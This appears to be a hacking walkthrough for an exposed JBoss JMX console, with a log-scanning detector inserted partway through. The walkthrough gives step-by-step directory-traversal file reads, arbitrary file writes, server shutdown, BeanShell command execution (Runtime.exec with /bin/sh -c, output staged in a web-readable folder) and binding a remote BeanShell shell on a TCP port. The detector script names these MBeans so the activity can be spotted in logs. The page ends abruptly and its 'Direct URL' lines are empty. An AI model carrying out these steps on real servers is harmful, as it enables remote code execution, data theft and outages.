More JBOSS hacking

Deployed Apps Listing

From the JMX console, use the MainDeployer agent (picture #13). Direct URL:

Click Invoke on the java.util.Collection listDeployed() item (picture #14).

Deployment Scanner

Shutdown

From the JMX console, go to jboss.system type=server (picture #15). Direct URL:

Interacting with the underlying OS

Locating Server Root Directory

From the JMX console, ServerHomeURL can be found in jboss.system type=serverconfig. Direct URL:

Reading (any) File

From the JMX console, use the SystemProperties agent: name=SystemProperties,type=Service (picture #10). Direct URL:

Fill the input box named URLLIST in the first table with the file you want to read, using a directory traversal URL like file://../../../../readme.txt, and click “apply changes” (picture #11). Then, to read the file readme, go to the “java.util.Map showAll()” function and click “apply”. If everything worked (i.e., no crash or 500 Internal Server Error), you should find your file somewhere in the page (picture #12).

Writing a File (anywhere)

From the JMX console, go to name=DeploymentFileRepository, type=Service. Direct URL:

Look for the store() method, then fill the input boxes as follows:

    arg0 = directory
    arg1 = filename
    arg2 = null
    arg3 = url-encoded file

The encoded file will be stored at: /server/default/deploy/management/directory

This method is vulnerable to directory traversal!

Executing Operating System Commands

JBoss supports BeanShell, which is a useful small “Java source interpreter”. From the JMX console, go to name=BSHDeployer,type=service. Direct URL:

(picture #16) Look for the createScriptDeployment() method, then fill the input boxes as follows (picture #18):

    p1 = Runtime.getRuntime().exec("touch /tmp/pippo");
    p2 = "Script Name"

Then click “Apply”.

A different syntax is needed to concatenate several commands with a pipe “|” or IO redirection “<>”:

    Runtime.getRuntime().exec(new String[] { "/bin/sh", "-c", "ls -al;id;uname -a"});

The command execution is blind. To see the command output you can use this trick: redirect the command output to a file. There are a few physical locations you can use to write a readable file on the wwwroot of a Tomcat/JBoss framework. We found that $ServerHomeURL/deploy/jmx-console.war/images/ is a good place, i.e.:

    Runtime.getRuntime().exec(new String[] { "/bin/sh", "-c", "ls -al;id;uname -a > /jboss-4.0.2/server/default/deploy/jmx-console.war/images/logo2.txt"});

Then check the results here: http://localhost:8080/jmx-console/images/logo2.txt

Moreover, it’s possible to bind a BSH instance on a TCP port by filling the input boxes as follows:

    p1 = import *; server (50000);
    p2 = "Script name"

If everything went fine, you should find the shell applet either at http://localhost:50000/ or via telnet at localhost:50001 (picture #19).
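Every step above goes through pages under /jmx-console/, so the web access log is a practical place to spot this activity. The detector below is an added example, not part of the original write-up: the MBean names are the ones named on this page, while the log lines, addresses and query-string layout are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined-log-format fields: client, method, URL, status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# MBean names from the walkthrough above, matched on the lower-cased URL.
MBEAN_RULES = [
    (re.compile(r"maindeployer"), "deployed-apps listing (MainDeployer)"),
    (re.compile(r"type=serverconfig"), "server root lookup (ServerHomeURL)"),
    (re.compile(r"type=server\b"), "server control (shutdown)"),
    (re.compile(r"systemproperties"), "file read (SystemProperties)"),
    (re.compile(r"deploymentfilerepository"), "file write (store())"),
    (re.compile(r"bshdeployer"), "BeanShell script deployment"),
]
IMAGE_EXT = (".gif", ".png", ".jpg", ".jpeg", ".ico")

def classify(line):
    """Return (client, finding) for a suspicious JMX console request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, _method, url, _status = m.groups()
    decoded = unquote(url).lower()  # MBean names arrive URL-encoded
    if not decoded.startswith("/jmx-console/"):
        return None
    path = decoded.split("?", 1)[0]
    # A non-image file under images/ matches the output-staging trick above.
    if path.startswith("/jmx-console/images/") and not path.endswith(IMAGE_EXT):
        return client, "non-image file served from jmx-console images/"
    for pattern, finding in MBEAN_RULES:
        if pattern.search(decoded):
            return client, finding
    return None

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines: addresses, timestamps and query layout are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system%3Atype%3DServer HTTP/1.1" 200 4096',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=name%3DBSHDeployer%2Ctype%3Dservice HTTP/1.1" 200 3900',
    '192.0.2.10 - - [01/Jan/2024:10:00:30 +0000] "GET /jmx-console/images/logo2.txt HTTP/1.1" 200 612',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /jmx-console/images/logo.gif HTTP/1.1" 200 2000',
    '198.51.100.7 - - [01/Jan/2024:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Requests whose parameters travel in a POST body do not show the MBean name in an access log, so treat any hit as a prompt to check whether /jmx-console/ is reachable without authentication at all.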

Checking File Existence

Direct URL: